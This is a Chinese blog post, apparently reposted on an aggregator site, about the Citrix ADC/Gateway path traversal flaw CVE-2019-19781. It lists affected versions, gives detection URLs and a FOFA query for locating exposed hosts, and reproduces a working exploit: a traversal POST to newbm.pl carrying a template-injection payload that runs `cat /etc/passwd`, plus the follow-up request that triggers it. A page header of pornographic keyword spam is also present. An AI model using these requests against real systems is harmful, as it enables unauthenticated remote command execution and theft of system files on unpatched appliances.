日韩av黄I国产麻豆传媒I国产91av视频在线观看I日韩一区二区三区在线看I美女国产在线I麻豆视频国产在线观看I成人黄色短片

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 >

Citrix路径遍历(CVE-2019-19781)

發布時間:2025/3/15 34 豆豆
生活随笔 收集整理的這篇文章主要介紹了 Citrix路径遍历(CVE-2019-19781) 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

漏洞描述

Citrix旗下多款交付控制器和網關存在RCE漏洞,攻擊者在無需身份驗證的情況下就可執行任意命令。根據其他安全網站的說法,這個RCE漏洞會有一個標記漏洞(其中之一的標記),即本次報道的Citrx路徑遍歷漏洞(CVE-2019-19781)。Citrx路徑遍歷漏洞(CVE-2019-19781)利用方式的PoC已被公開。該漏洞利用復雜性低,且無權限要求,攻擊者只能遍歷vpns文件夾,但攻擊者可能利用Citrx路徑遍歷漏洞進行RCE漏洞試探,從而發起進一步精準攻擊。

影響范圍

Citrix NetScaler ADC and NetScaler Gateway version 10.5,Citrix ADC and NetScaler Gateway version 11.1 , 12.0 , 12.1 ,Citrix ADC and Citrix Gateway version 13.0

漏洞檢測方法

根據此次公開的PoC顯示,該洞目錄遍歷被限制子在vpns文件夾下,任意用戶可通過HTTP請求直接訪問該目錄下的文件。

https://xx.xx.xx.xx/vpn/../vpns/services.html https://xx.xx.xx.xx/vpn/../vpns/smb.conf 如果沒有修復的話的會返回 http 200

通過fofa搜索

title="Citrix"

目前還是有很多沒打補丁的

附上POC,建議修改文件名,文件名為:jas502n

POST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1 Host: 192.168.3.244 User-Agent: 1 Connection: close NSC_USER: ../../../netscaler/portal/templates/jas502n NSC_NONCE: nsroot Content-Length: 97url=http://example.com&title=jas502n&desc=[% template.new('BLOCK' = 'print `cat /etc/passwd`') %]

請求上傳的內容

GET /vpn/../vpns/portal/jas502n.xml HTTP/1.1 Host: 192.168.3.244 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close NSC_USER: nsroot NSC_NONCE: nsroot Upgrade-Insecure-Requests: 1 Cache-Control: max-age=0

以上代碼來自jas502n大佬,GitHub地址:https://github.com/jas502n/CVE-2019-19781

修復建議

請參考官方緩解措施:https://support.citrix.com/article/CTX267679

新人創作打卡挑戰賽發博客就能抽獎!定制產品紅包拿不停!

總結

以上是生活随笔為你收集整理的Citrix路径遍历(CVE-2019-19781)的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。